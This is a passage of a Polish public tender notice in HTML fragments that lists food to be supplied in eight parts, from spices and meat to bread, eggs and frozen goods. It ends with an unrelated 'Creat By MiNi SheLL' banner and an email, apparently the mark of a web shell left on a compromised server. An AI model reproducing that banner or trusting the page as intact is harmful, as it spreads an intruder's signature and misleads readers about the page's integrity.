Rogal z nadzieniem, mix smaków-wartość energetyczna w 100 g produktu 450 kcal,białka 7g, op.60 g-180 szt. Cukier puder, op.400 g-20 szt. Cukier waniliowy, op.16 g. -140 szt. Proszek do pieczenia, op.18 g -20 szt. Kwasek cytrynowy, op.20 g. -50 szt. Pieprz czarny mielony, op.20 g- 80 szt. Pieprz ziołowy mielony, op.20 g. - 20 szt. Przyprawa tzatziki, op.20 g-15 szt. Czosnek granulowany, op.20 g - 70 szt. Papryka słodka, op.20 g- 30 szt.  Papryka ostra, op.20 g. - 30 szt. 
Przyprawa do grilla, op.20 g. - 30 szt. Przyprawa do kurczaka, op.20 g. - 30 szt
Przyprawa do ryb, op.20 g. - 20 szt. Majeranek otarty, op.10 g. -20 szt. Sól spożywcza jodowana, op.1 kg - 40 kg. Bazylia, op 7 g - 5 szt. Oregano, op.7 g
5 szt. - Wiórki kokosowe, op.100 g- 5 szt. Rodzynka, op.100 g- 5 szt. Goździki całe, op.10 g- 2 szt. Soda oczyszczona, op.70 g- 10 szt. Napój owocowy, mix smaków - wartość energetyczna w 100 ml produktu 47 kcal,białka0,2g,op.400ml
100 szt. - Konserwa gulasz angielski, op.300 g - puszka -15 szt. Filety ze śledzia w oleju-skład:filety ze śledzia ze skórą parowane 60%, op.170g - puszka - 20 szt. Filety ze śledzia w sosie pomidor. - skład:filety ze śledzia ze skórą parowane 50%, op.170g - puszka- 20 szt. Ogórek konserwowy- op.0,9 l-słoik - 80 szt
Krem do smarowania pieczywa z orzechami laskowymi-wartość energetyczna w 100 g 544 kcal,-białka 6 g, op. szklane 230g - 40 szt. Koncentrat barszczu, op.330 ml-butelka szklana - 6 szt. Zupa barszcz czerwony w proszku-wartość energetyczna w 100 ml - 21 kcal,białko 0,2 g, op.55 g. - 60 szt. Ananas 565 g, - po odcieku 340 g , op.- puszka -  15 szt. Brzoskwinia 850 g, - bez zalewy 460 g, op.- puszka-
30 szt. Andruty suche-wartość energetyczna w 100 g aroduktu 355 kcal,białka 9,9g,op.250g - 20 szt.  Orzechy łuskane, op.100 g- 3 szt. Czekolada mleczna - wartość energetyczna w 100g produktu 530 kcal,białka 5,6g, op.100g - 30 szt
Czekolada mleczna, mix smaków nadziewana, op. 100 g- 50 szt. Wafle familijne z cukrem,op. 2000 g. - 60 szt. Sos neapolitański w proszku - wartość energetyczna  w 100 ml produktu 59 kcal,białka 1,2 g, op.49 g - 40 szt. Nektar multiwitamina-wartość energetyczna w 100 ml produktu 46 kcal, białka 0,3g, op.1 l - 40 szt. 
Kompot owocowy,mix smaków pasteryzowany, op.900 g - słoik - 75 szt. Cynamon mielony, op.20 g - 5 szt. Woda mineralna nienasycona dwutlenkiem węgla - średnio zmineralizowana, składniki mineralne 742 mg/l, op.1,5 l - 180 szt. Woda mineralna niegazowana -całkowita ogólna mineralizacja 258,27 mg/l , op.500g  - 50 szt. Wafle przekładane kremem kakaowym-wartość energetyczna w 100 g produktu 468 kcal, białka 8,1 g, op.26 g - 150 szt. Lody pyszne,mix smaków, op.200 ml - 80 szt.
Mleko w proszku, op.500 g- 4 szt. Krem do ciast czekoladowy w proszku-wartość energetyczna w 100 g produktu 159 kcal, - białko5 g, op.110 g- 10 szt. 
Krem do ciast waniliowy w proszku- wartość energetyczna w 100 g produktu 184 kcal, białko3,9g,op.120g -10 szt. Ser topiony kostka- zawartość tłuszczu 27% , op.100 g - 100 szt. Sałatka z kapusty czerwonej-skład: kapusta czerwona 80%,op.890g- słoik- 40 szt. Papryka konserwowa słodka-skład:papryka70%, op.900g - słoik-12 szt. Oliwa z oliwek, op.0,5 l- 5 szt. Lizak kulisty, op.8g ( 50 szt )
2 op. Masło ekstra,op. 1 kg-1 kg. Drożdże piekarskie.,op.1 kg- 1,50 kg. Kisiel błyskawiczny mix smaków- wartość energetyczna w 100g produktu 69 kcal,białka0,3g,op.31,5g - 250 szt. Budyń błyskawiczny mix smaków- wartość energetyczna w 100 g produktu 80 kcal,białka 1,8g,op.43 g - 300 szt. Sos sałatkowy, mix smaków, op. 9 g - 20 szt. Wafelek przekładany masą, op.28g - 
60 szt. Liść laurowy, op.8g- 15 szt. Ziele angielskie, op.15g- 15 szt. Przyprawa do gyrosa, op.30 g - 15 szt. Zupa borowikowa - wartość energetyczna w 100 ml produktu 34 kcal, białko 1,3 g, op.45 g - 80 szt. Zupa grzybowa - wartość energetyczna w 100 ml produktu 20 kcal,białko 0,5 g, op.40 g - 40 szt. 
Ćwikła z chrzanem,op.300 g -4 szt. Pasztet wielkopolski -   mix smaków, op. alupack 131g- 25 szt. Bita śmietana w sprayu, op.250 ml- 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO, PRODUKTY MIĘSNE, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny. Kiełbasa śląska wieprzowa- 55 kg. Boczek surowy wędzony- 35 kg.
Szynka konserwowa- 15 kg. Kiełbasa biała surowa- 5 kg. Mortadela wieprzowa - 
12 kg. Ogonówka wieprzowa- 10 kg. Parówka cienka wieprzowa - 25 kg. Kiełbasa podsuszana drobiowa- 10 kg. Szynka-polędwica drobiowa- 15 kg. Szynka sopocka
 -15 kg. Pasztet drobiowy- 20 kg. Pasztet wieprzowy - 15 kg. Szynka złocista -
10 kg.  Mielonka wieprzowa- 35 kg. Kiełbasa podwawelska wieprz. - 20 kg. Kiełbasa zwyczajna - 30 kg. Filecik opiekany- 15 kg. Kiełbasa szynkowa wieprz. - 6 kg. 
Lunchmeat królewski - 20 kg. Kiełbasa krakowska sucha - 15 kg. Serdelki wieprzowe-drobiowe - 20 kg. Kabanos dębowy - 2 kg. Kiełbasa żywiecka wieprzowa - 5 kg. Kiełbasa polska wędzona - 10 kg. Kiełbasa jałowcowa - 1 kg. 

MIĘSO. Mięso stekowe wieprzowe- 20 kg. Mięso mielone wieprz-wołowe - 70 kg. 
Kości wędzone - 20 kg. Kości wieprzowe - 45 kg. Porcja rosołowa - 80 kg. Kurczak świeży - 55 kg. Żołądki drobiowe- 20 kg. Wątróbka drobiowa - 16 kg. Udka z kurczaka - 50 kg. Ćwiartki z kurczaka- 30 kg. Filet drobiowy z kurczaka - 60 kg. 
Skrzydełka z kurczaka - 45 kg. Łopatka b / k - 80 kg. Schab b / k - 40 kg. Karczek b / k- 40 kg. Żeberka wieprzowe - 15 kg. Kaszanka wieprzowa - 15 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane -zawartość tłuszczu 2,0 % , op. karton 1 l - 1 130,00 l. . Jogurt mix smaków owocowy - wartość energetyczna w 100g produktu  77 kcal,białka 1,8g op.125g - 300 szt. Jogurt naturalny, zawartość tłuszczu 2 % -  wartość energetyczna w 100 g produktu  - 59 kcal,białka 4,2 g,op. kubek 400 g - 
60 szt. Serek wiejski - wartość energetyczna w 100g produktu 112 Kcal, białka12g,op 200g - 100 szt. Śmietana-zawartość tłuszczu 12% ,wartość energetyczna w 100g produktu  - 134 kcal,białka 2,7 g, op. kubek 400 g - 
150 szt. Śmietana- zawartość tłuszczu 18%,wartość energetyczna w 100g - Produktu 186 kcal,- białka 2,8g, op. kubek 400 g - 60 szt. Serek homogenizowany,
termizowany,mix smaków- wartość energetyczna w 100g produktu136 kcal,
białka 5,0g, op.150 g  - 250 szt. Twaróg śmietankowy tłusty - 20 kg. Jogurt pitny,mix smaków-wartość energetyczna w100g produktu 64 kcal, białka 3,1g, op. 330 g - 120 szt. Maślanka - zawartość tłuszczu 1,5 % - mix smaków, op. butelka 1 l - 90 szt. Deser o smaku czekoladowym lub waniliowym z bitą śmietaną- wartość energetyczna w 100g produktu 108 kcal, białka1,4 g ,op.175 g - 300 szt. Ser żółty- salami - 20 kg. Ser żółty- gouda - 40 kg. Serek kanapkowy mix smaków -
wartość energetyczna w 100g produktu 255 kcal,białka 6 g,op.150g - 80 szt. 
Ser topiony bloczek- zawartość tłuszczu 27%, mix smaków, op.100g - 180 szt. 
Kefir - wartość energetyczna w 100g produktu 43 kcal,białka 3,0 g - op. butelka 400g - 120 szt. Deser czekoladowy - 4 x 256g. - 200 szt. Ser twarogowy półtłusty - zawartość tłuszczu 4%, op. 1 kg- 50 kg. Ser topiony plasterkowany mix smaków-wartość energetyczna w 100 g produktu 276 kcal,białka15,0g,op.150g - 80 szt. Ser twarogowy chudy - zawartość tłuszczu 0,5% - 10 kg. Śmietanka kremówka 30% ,op. karton 1l - 4 l. Mleko słodzone gotowane -wartość energetyczna w 100 g produktu 297 kcal, białka 6,8g,op.510 g  - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> OWOCE - WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OWOCE : Banan - 35 kg. Cytryna - 30 kg. Jabłka- 200 kg. Gruszka - 50 kg. Kiwi - 
10 kg. Mandarynka - 30 kg. Pomarańcze - 35 kg. Truskawka świeża -15 kg. 
Arbuz- 15 kg. Nektarynka - 15 kg. 
WARZYWA. : 
Burak czerwony - 70 kg. Botwinka - 30 pęczek. Cebula - 110 kg. Czosnek surowy-
40 szt. Szczaw świeży- 40 pęczków. Kapusta biała - 100 kg. Kapusta czerwona -
30 kg. Kapusta kwaszona- 110 kg. Kapusta młoda - 45 szt. Kapusta pekińska- 
35 kg. Kapusta włoska - 10 kg. Koperek - 140 pęczek. Marchew korzeń - 250 kg. 
Ogórek zielony - 100 kg. Ogórek kwaszony- 100 kg. Papryka świeża (różne kolory)
- 25 kg. Pieczarka- 45 kg. Pietruszka korzeń - 95 kg. Pietruszka natka - 160 pęczków. Pomidor - 85 kg. Por- 70 kg. Rzodkiewka- 35 szt. Rzodkiew biała - 15 kg. 
Sałata zielona - 75 szt. Seler korzeń - 80 kg. Szczypiorek- 80 szt. Ziemniaki - 
1.850,00 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenno-żytni, krojony 600g - 800 szt. Bułka wrocławska 100 g - 580 szt.
Chleb graham, krojony 500g - 50 szt. Bułka słodka 100 g - 150 szt.
Pączek 100 g. - 120 szt. Chleb tostowy, krojony 400g - 135 szt. Chleb  wieloziarnisty, krojony 400g - 30 szt. Bułka wieloziarnista 70 g - 120 szt. 
Bułka grahamka 80 g. - 250 szt. Chleb magnus, krojony 350g  - 80 szt. Rogal maślany 100 g. - 80 szt. Chałka drożdżowa 300 g. - 60 szt. Bułka wrocławska hamburger 100g - 40 szt. Bułka wrocławska, hot-dog 100 g -  50 szt. 
Bułka maślana 70 g. - 50 szt. Chleb domowy, krojony 600 g - 50 szt. 
Chleb dworski, krojony 350 g. - 20 szt. Chleb dobry, krojony 350 g. - 10 szt. 
Chleb słońce, krojony 400 g. - 20 szt. Chlebek wielkanocny - 12 szt. 
Babeczka wielkanocna - 12 szt. Baranek wielkanocny - 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja - klasa wagowa   L  - 3.000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RYBY MROŻONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RYBY  mrozone: Filet z morszczuka, 1 kg płaty SHP - 30 kg. Filet z soli, 1 kg płaty  SHP - 25 kg. Filet z dorsza-czarniak, 1 kg  - płaty  SHP - 30 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Truskawka mrożona-30 kg. Mieszanka kompotowa mrożona- 35 kg. 
Brokuł mrożony- 30 kg. Fasolka szparagowa mrożona- 25 kg. Kalafior mrożony-
50 kg. Mieszanka 8 - składnikowa mrożona- 25 kg. Marchew z groszkiem mrożony- 
25 kg. Frytka mrożona- 40 kg. Warzywa na patelnię mrożone - 35 kg. Włoszczyzna mrożona - 10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com